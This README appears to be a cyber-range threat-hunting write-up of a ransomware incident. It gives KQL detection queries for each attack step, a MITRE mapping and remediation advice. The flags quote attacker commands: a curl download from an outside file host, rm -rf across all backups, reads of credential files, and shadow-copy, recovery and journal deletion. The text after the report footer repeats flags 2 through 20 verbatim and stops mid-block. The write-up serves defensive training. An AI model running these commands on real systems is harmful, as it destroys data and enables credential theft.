nadeznamorris/Threat-Hunting-Scenario-Dead-In-The-Water
GitHub: nadeznamorris/Threat-Hunting-Scenario-Dead-In-The-Water
一个基于勒索软件入侵事件的威胁狩猎实操场景,提供分阶段的 KQL 检测查询和取证分析练习。
Stars: 0 | Forks: 0
# 威胁狩猎场景:Dead In The Water —— Azuki 泄露事件
## RDP 泄露事件
**报告 ID:** INC-2026-0301
**分析师:** Nadezna Morris
**日期:** 2026年1月3日
**事件日期:** 2025年11月27日
## 执行摘要
在首次入侵一周后,威胁行为者返回以完成他们开始的行动。利用在入侵早期获取的凭据,攻击者从 `10.1.0.108` 的立足点通过 `backup-admin account` 直接进入了组织的 Linux 备份服务器 (`10.1.0.189`)。随后,他们枚举了每个备份存储库,获取了一个明文凭据文件,下载了一个外部的破坏工具包,并永久删除了整个环境中的所有备份存档。在消除了恢复选项后,攻击者使用窃取的域凭据 (`kenji.sato`) 和 `PsExec64.exe` 转向了 Windows 资产,将 **SilentLynx** 勒索软件 (`silentlynx.exe`) 推送到包括 `10.1.0.204` 在内的其他主机上。
在加密之前,勒索软件有条不紊地禁用了所有原生的 Windows 恢复机制 —— 卷影副本、备份目录、系统恢复和 USN 日志 —— 然后在受感染的系统中投放了 `SILENTLYNX_README.txt` 勒索说明。备份擦除和勒索软件部署的综合影响使得该组织实际上没有任何内部恢复途径;恢复将完全依赖于离线/异地副本(如果存在的话)。
## 1. 调查发现
### 关键失陷指标 (IOCs):
| 指标 | 描述 |
| -------------------------------------------------| ---------------------------------------------------------|
| 10.1.0.108 | 发起 SSH 转向至备份基础设施的源头 |
| 10.1.0.189 | 被攻陷的备份服务器 |
| 10.1.0.204 | 通过 PsExec 部署勒索软件的目标 |
| backup-admin | 用于访问备份服务器的特权账户 |
| kenji.sato | 用于横向移动的被盗凭据 |
| https://litter.catbox.moe/io523y.7z (destroy.7z) | 外部暂存的破坏工具包 |
| PsExec64.exe | 用于将 payload 推送至 C:\Windows\Temp\cache\ |
| silentlynx.exe | 在目标主机上部署并执行的勒索软件 payload |
| WindowsSecurityHealth | 伪装成合法 Windows 服务的 Run 键 |
| Microsoft\Windows\Security\SecurityHealthService | 伪装成内置安全任务 |
| SILENTLYNX_README.txt | 在加密系统上投放的勒索说明 |
| /backups/configs/all-credentials.txt | 备份服务器上的明文凭据存储库 |
### 阶段 1:LINUX 备份服务器失陷
***FLAG 1:横向移动 - 远程访问***
**目标:** 攻击者转向关键基础设施,以在部署勒索软件之前消除恢复选项。
**Flag:** `"ssh.exe" backup-admin@10.1.0.189`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has_any ("ssh.exe", "plink.exe")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 2:横向移动 - 攻击来源***
**目标:** 识别攻击来源可实现网络隔离和控制。
**Flag:** `10.1.0.108`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where LogonType in ("Network")
| where ActionType == "LogonSuccess"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 3:凭据访问 - 被攻陷的账户***
**目标:** 具有备份权限的管理账户提供了对关键恢复基础设施的访问权限。
**Flag:** `backup-admin`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where LogonType in ("Network")
| where ActionType == "LogonSuccess"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 4:发现 - 目录枚举***
**目标:** 文件系统枚举揭示了备份位置和有价值的破坏目标。
**Flag:** `ls --color=auto -la /backups/`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("dir", "ls")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 5:发现 - 文件搜索***
**目标:** 攻击者搜索特定的文件类型以识别高价值目标。
**Flag:** `find /backups -name *.tar.gz`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("*.bak", "*.zip", "*.7z", "*.tar", "*.gz")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 6:发现 - 账户枚举***
**目标:** 攻击者枚举本地账户以了解系统的用户群。
**Flag:** `cat /etc/passwd`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net user", "wmic useraccount", "Get-LocalUser", "/etc/passwd", "getent passwd")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 7:发现 - 计划任务侦察***
**目标:** 了解备份计划可帮助攻击者安排破坏时间,以达到最大影响。
**Flag:** `cat /etc/crontab`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("cat", "schtasks", "crontab", "/etc/cron")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 8:命令与控制 - 工具传输***
**目标:** 攻击者从外部基础设施下载工具以执行攻击。
**Flag:** `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("http://", "https://")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
```
***FLAG 9:凭据访问 - 凭据窃取***
**目标:** 备份服务器通常存储包含凭据的敏感配置文件。
**Flag:** `cat /backups/configs/all-credentials.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("credentials")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 10:影响 - 数据破坏***
**目标:** 销毁备份消除了恢复选项,并使勒索软件的影响最大化。
**Flag:** `rm -rf /backups/archives /backups/azuki-adminpc /backups/azuki-fileserver /backups/azuki-logisticspc /backups/config-backups /backups/configs /backups/daily /backups/database-backups /backups/databases /backups/fileserver /backups/logs /backups/monthly /backups/weekly /backups/workstations`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("del ", "rmdir ", "Remove-Item", "rm -rf", "vssadmin", "wbadmin")
| project TimeGenerated, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 11:影响 - 服务停止***
**目标:** 停止服务会立即生效,但在重启后无法保持。
**Flag:** `systemctl stop cron`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net stop", "sc stop", "Stop-Service", "systemctl stop")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 12:影响 - 服务禁用***
**目标:** 禁用服务会阻止其在开机时启动 —— 这在重启后依然生效。
**Flag:** `systemctl disable cron`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("sc config", "Set-Service", "systemctl disable", "chkconfig")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
### 阶段 2:WINDOWS 勒索软件部署
***FLAG 13:横向移动 - 远程执行***
**目标:** 远程管理工具使攻击者能够同时在多个系统上部署恶意软件。
**Flag:** `PsExec64.exe`
```
DeviceProcessEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName startswith "pse"
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 14:横向移动 - 部署命令***
**目标:** 完整的命令行揭示了目标系统、凭据和已部署的 payload。
**Flag:** `"PsExec64.exe" \\10.1.0.204 -u kenji.sato -p ********** -c -f C:\Windows\Temp\cache\silentlynx.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName startswith "pse"
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 15:执行 - 恶意 Payload***
**目标:** 识别 payload 可实现整个环境中的威胁狩猎。
**Flag:** `silentlynx.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has "PsExec64.exe"
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
### 阶段 3:抑制恢复
***FLAG 16:影响 - 卷影服务停止***
**目标:** 勒索软件停止备份服务以防止在加密过程中进行恢复。
**Flag:** `"net" stop VSS /y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vss")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 17:影响 - 备份引擎停止***
**目标:** 停止备份引擎可防止在攻击过程中进行备份操作。
**Flag:** `"net" stop wbengine /y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net stop", "sc stop", "Stop-Service", "backup", "engine", "veeam", "wbengine", "exec")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 18:防御规避 - 进程终止***
**目标:** 某些进程会锁定文件,必须在加密成功之前将其终止。
**Flag:** `"taskkill" /F /IM sqlservr.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("taskkill", "Stop-Service", "Stop-Process", "wmic process", "kill", "pkill")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 19:影响 - 恢复点删除***
**目标:** 恢复点支持在不使用外部备份的情况下快速恢复文件。
**Flag:** `"vssadmin" delete shadows /all /quiet`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vssadmin", "shadowcopy", "diskshadow", "wbadmin delete")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 20:影响 - 存储限制***
**目标:** 限制存储可防止创建新的恢复点。
**Flag:** `"vssadmin" resize shadowstorage /for=C: /on=C: /maxsize=401MB`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vssadmin", "shadowcopy", "resize")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
***FLAG 21:影响 - 恢复禁用***
**目标:** Windows 恢复功能支持在损坏后进行自动系统修复。
**Flag:** `"bcdedit" /set {default} recoveryenabled No`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("bcdedit", "reagentc", "recoveryenabled", "disable")
| where ProcessCommandLine !has "msedgewebview2"
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
***FLAG 22:影响 - 目录删除***
**目标:** 备份目录会跟踪可用的还原点和备份版本。
**Flag:** `"wbadmin" delete catalog -quiet`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("wbadmin", "delete")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
### 阶段 4:持久化
****FLAG 23:持久化 - 注册表自动运行***
**目标:** 注册表键可以在系统启动时自动执行程序。
**Flag:** `WindowsSecurityHealth`
```
DeviceRegistryEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where RegistryKey has @"CurrentVersion\Run"
| where ActionType in ("RegistryValueSet", "RegistryValueModified")
| project TimeGenerated, DeviceName, RegistryKey, RegistryValueName, RegistryValueData
| order by TimeGenerated desc
```
***FLAG 24:持久化 - 计划执行***
**目标:** 计划任务通过可配置的触发器提供可靠的持久化。
**Flag:** `Microsoft\Windows\Security\SecurityHealthService`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has "schtasks"
| where ProcessCommandLine has "/create"
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
### 阶段 5:反取证
***FLAG 25:防御规避 - 日志删除***
**目标:** 文件系统日志会跟踪更改,对取证分析很有价值。
**Flag:** `"fsutil.exe" usn deletejournal /D C:`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("deletejournal")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
### 阶段 6:勒索软件成功
***FLAG 26:影响 - 勒索说明***
**目标:** 勒索说明传达了支付指令,并表明加密成功。
**Flag:** `SILENTLYNX_README.txt`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has_any (".txt")
| project TimeGenerated, DeviceName, FileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
```
## 2. 调查总结
攻击链始于从 `10.1.0.108` 到 `backup-admin@10.1.0.189` 的 SSH 连接,这为攻击者提供了在组织核心 Linux 备份服务器上的立足点。从这里开始,他们进行了有条不紊的侦察 —— 列出 `/backups/`,搜索 `*.tar.gz` 存档,查看 `/etc/passwd` 以获取本地账户,并读取 `/etc/crontab` 以了解备份计划并安排破坏时间以达到最大影响。然后,他们从公共文件共享主机拉取了一个外部存档 (`destroy.7z`),并利用它来支持破坏阶段。一个明文凭据文件 (`/backups/configs/all-credentials.txt`) 被窃取,几乎可以肯定提供了稍后用于 Windows 横向移动的 `kenji.sato` 凭据。然后,攻击者跨每个备份目录执行了全面的 `rm -rf` 命令 —— 存档、每日/每周/每月备份集、数据库备份以及每个主机的工作站/服务器备份 —— 销毁了所有恢复点。为了确保销毁操作在重启后依然生效,他们既停止 (`systemctl stop cron`) 又禁用 (`systemctl disable cron`) 了负责正在进行的备份作业的 cron 服务。
在 Linux 备份基础设施被消除后,攻击者使用 `PsExec64.exe` 和 `kenji.sato` 凭据转向了 Windows 环境,从暂存路径 `C:\Windows\Temp\cache\` 在 `10.1.0.204`(以及其他可能的主机)上远程执行了 `silentlynx.exe`。执行时,SilentLynx 执行了教科书般的加密前恢复擦除:它停止了卷影副本 (`VSS`) 和 Windows 备份引擎 (`wbengine`) 服务,杀死了 `sqlservr.exe` 以释放被锁定的数据库文件,删除了所有现有的卷影副本并将卷影存储限制为 401MB 以防止生成新的副本,通过 `bcdedit` 禁用了 Windows 的自动恢复功能,并通过 `wbadmin` 清除了 Windows Server 备份目录。作为最后一步反取证操作,它使用 `fsutil` 擦除了 NTFS USN 更改日志,移除了调查人员获取文件活动历史记录的关键来源。恶意软件通过注册表 Run 键 (`WindowsSecurityHealth`) 和计划任务 (`Microsoft\Windows\Security\SecurityHealthService`) 建立了持久化 —— 两者都伪装成合法的 Windows 安全组件 —— 随后完成了加密并投放了 `SILENTLYNX_README.txt` 勒索说明。
##3. MITRE ATT&CK 映射
| 战术 | 技术 | 证据 |
| ------------------------------------------ | ------------------------------------------------------------ | ----------------------------------------------- |
| 横向移动 | T1021.004 – Remote Services: SSH | 从 10.1.0.108 到 backup-admin@10.1.0.189 的 SSH |
| 持久化 / 初始访问 | T1078 – Valid Accounts | 使用 backup-admin 和 kenji.sato 凭据 |
| 发现 | T1083 – File and Directory Discovery | ls /backups/, find /backups -name *.tar.gz |
| 发现 | T1087.001 – Account Discovery: Local Account | cat /etc/passwd |
| 发现 | T1053.003 – Scheduled Task/Job: Cron | cat /etc/crontab |
| 命令与控制 / 资源开发 | T1105 – Ingress Tool Transfer | curl 下载 destroy.7z |
| 凭据访问 | T1552.001 – Unsecured Credentials: Credentials In Files | cat /backups/configs/all-credentials.txt |
| 影响 | T1485 – Data Destruction | rm -rf 所有备份目录 |
| 影响 | T1489 – Service Stop | systemctl stop cron, net stop VSS/wbengine, taskkill sqlservr.exe |
| 影响 | T1490 – Inhibit System Recovery | systemctl disable cron, vssadmin delete shadows/resize shadowstorage, bcdedit recoveryenabled No, wbadmin delete catalog|
| 横向移动 | T1570 / T1021.002 – Lateral Tool Transfer / SMB Admin Shares | PsExec64.exe 到 10.1.0.204 |
| 影响 | T1486 – Data Encrypted for Impact | silentlynx.exe 执行, SILENTLYNX_README.txt |
| 防御规避 | T1070.004 – Indicator Removal: File Deletion | fsutil usn deletejournal /D C: |
| 持久化 | T1547.001 – Registry Run Keys / Startup Folder | WindowsSecurityHealth 注册表键 |
| 持久化 | T1053.005 – Scheduled Task | Microsoft\Windows\Security\SecurityHealthService |
## 4. 建议
### 紧急行动
- 将 `10.1.0.108`、`10.1.0.189` 和 `10.1.0.204` 与网络隔离,以阻止进一步的横向移动和破坏。
- 立即禁用/轮换 `backup-admin` 和 `kenji.sato` 凭据 —— 两者均被确认已泄露。
- 阻止发往 `litter.catbox.moe` 及类似文件共享/粘贴站点的出站流量,以切断进一步下载工具的途径。
- 在所有端点上对环境进行扫描,查找 `silentlynx.exe`、`PsExec64.exe`、`WindowsSecurityHealth` 注册表键以及 `Microsoft\Windows\Security\SecurityHealthService` 计划任务。
- 在采取可能覆盖它们的进一步修复步骤之前,识别并清点任何幸存的备份(离线、异地、云端)。
### 短期修复
- 轮换环境中的所有凭据,而不仅仅是已确认泄露的账户。
- 从每个受影响的主机上移除已识别的持久化机制(注册表键、计划任务)。
- 将备份服务器的 SSH 访问限制为小范围的允许列表/堡垒主机,并仅允许基于密钥的身份验证。
- 部署或调整 EDR 告警以监视恢复抑制命令:`vssadmin delete shadows`、`vssadmin resize shadowstorage`、`wbadmin delete catalog`、`bcdedit recoveryenabled No`、`net stop VSS/wbengine`。
- 从干净的镜像重建被加密的主机,并从任何幸存的离线/异地备份中恢复数据。
- 从备份基础设施中移除明文凭据文件(例如 `all-credentials.txt`)。
### 长期修复
- 实施 3-2-1 备份策略,采用生产网络入侵无法触及的不可变、网闸隔离或离线副本。
- 将备份基础设施隔离到其专属的受限网络区域中,与常规的工作站/服务器 VLAN 分开。
- 部署特权访问管理 (PAM) 和机密保险库解决方案,以消除存储的明文凭据。。
- 对所有特权和管理账户强制执行 MFA。
- 针对横向移动工具(PsExec、远程服务创建)和反取证活动(USN 日志删除)建立持续的威胁狩猎 / SOC 监控。
- 定期开展涵盖勒索软件 + 备份破坏场景的 IR 桌面演习。
**报告状态:** 已完成
**下次审查:** 2026 年 1 月 10 日
**分发范围:** Cyber Range
***FLAG 2:横向移动 - 攻击来源***
**目标:** 识别攻击来源可实现网络隔离和控制。
**Flag:** `10.1.0.108`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where LogonType in ("Network")
| where ActionType == "LogonSuccess"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 3:凭据访问 - 被攻陷的账户***
**目标:** 具有备份权限的管理账户提供了对关键恢复基础设施的访问权限。
**Flag:** `backup-admin`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where LogonType in ("Network")
| where ActionType == "LogonSuccess"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 4:发现 - 目录枚举***
**目标:** 文件系统枚举揭示了备份位置和有价值的破坏目标。
**Flag:** `ls --color=auto -la /backups/`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("dir", "ls")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 5:发现 - 文件搜索***
**目标:** 攻击者搜索特定的文件类型以识别高价值目标。
**Flag:** `find /backups -name *.tar.gz`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("*.bak", "*.zip", "*.7z", "*.tar", "*.gz")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 6:发现 - 账户枚举***
**目标:** 攻击者枚举本地账户以了解系统的用户群。
**Flag:** `cat /etc/passwd`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net user", "wmic useraccount", "Get-LocalUser", "/etc/passwd", "getent passwd")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 7:发现 - 计划任务侦察***
**目标:** 了解备份计划可帮助攻击者安排破坏时间,以达到最大影响。
**Flag:** `cat /etc/crontab`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("cat", "schtasks", "crontab", "/etc/cron")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 8:命令与控制 - 工具传输***
**目标:** 攻击者从外部基础设施下载工具以执行攻击。
**Flag:** `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("http://", "https://")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
```
***FLAG 9:凭据访问 - 凭据窃取***
**目标:** 备份服务器通常存储包含凭据的敏感配置文件。
**Flag:** `cat /backups/configs/all-credentials.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("credentials")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 10:影响 - 数据破坏***
**目标:** 销毁备份消除了恢复选项,并使勒索软件的影响最大化。
**Flag:** `rm -rf /backups/archives /backups/azuki-adminpc /backups/azuki-fileserver /backups/azuki-logisticspc /backups/config-backups /backups/configs /backups/daily /backups/database-backups /backups/databases /backups/fileserver /backups/logs /backups/monthly /backups/weekly /backups/workstations`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("del ", "rmdir ", "Remove-Item", "rm -rf", "vssadmin", "wbadmin")
| project TimeGenerated, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 11:影响 - 服务停止***
**目标:** 停止服务会立即生效,但在重启后无法保持。
**Flag:** `systemctl stop cron`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net stop", "sc stop", "Stop-Service", "systemctl stop")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 12:影响 - 服务禁用***
**目标:** 禁用服务会阻止其在开机时启动 —— 这在重启后依然生效。
**Flag:** `systemctl disable cron`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("sc config", "Set-Service", "systemctl disable", "chkconfig")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
### 阶段 2:WINDOWS 勒索软件部署
***FLAG 13:横向移动 - 远程执行***
**目标:** 远程管理工具使攻击者能够同时在多个系统上部署恶意软件。
**Flag:** `PsExec64.exe`
```
DeviceProcessEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName startswith "pse"
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 14:横向移动 - 部署命令***
**目标:** 完整的命令行揭示了目标系统、凭据和已部署的 payload。
**Flag:** `"PsExec64.exe" \\10.1.0.204 -u kenji.sato -p ********** -c -f C:\Windows\Temp\cache\silentlynx.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName startswith "pse"
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 15:执行 - 恶意 Payload***
**目标:** 识别 payload 可实现整个环境中的威胁狩猎。
**Flag:** `silentlynx.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has "PsExec64.exe"
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
### 阶段 3:抑制恢复
***FLAG 16:影响 - 卷影服务停止***
**目标:** 勒索软件停止备份服务以防止在加密过程中进行恢复。
**Flag:** `"net" stop VSS /y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vss")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 17:影响 - 备份引擎停止***
**目标:** 停止备份引擎可防止在攻击过程中进行备份操作。
**Flag:** `"net" stop wbengine /y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net stop", "sc stop", "Stop-Service", "backup", "engine", "veeam", "wbengine", "exec")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 18:防御规避 - 进程终止***
**目标:** 某些进程会锁定文件,必须在加密成功之前将其终止。
**Flag:** `"taskkill" /F /IM sqlservr.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("taskkill", "Stop-Service", "Stop-Process", "wmic process", "kill", "pkill")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 19:影响 - 恢复点删除***
**目标:** 恢复点支持在不使用外部备份的情况下快速恢复文件。
**Flag:** `"vssadmin" delete shadows /all /quiet`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vssadmin", "shadowcopy", "diskshadow", "wbadmin delete")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 20:影响 - 存储限制***
**目标:** 限制存储可防止创建新的恢复点。
**Flag:** `"vssadmin" resize shadowstorage /for=C: /on=C: /maxsize=401MB`
```
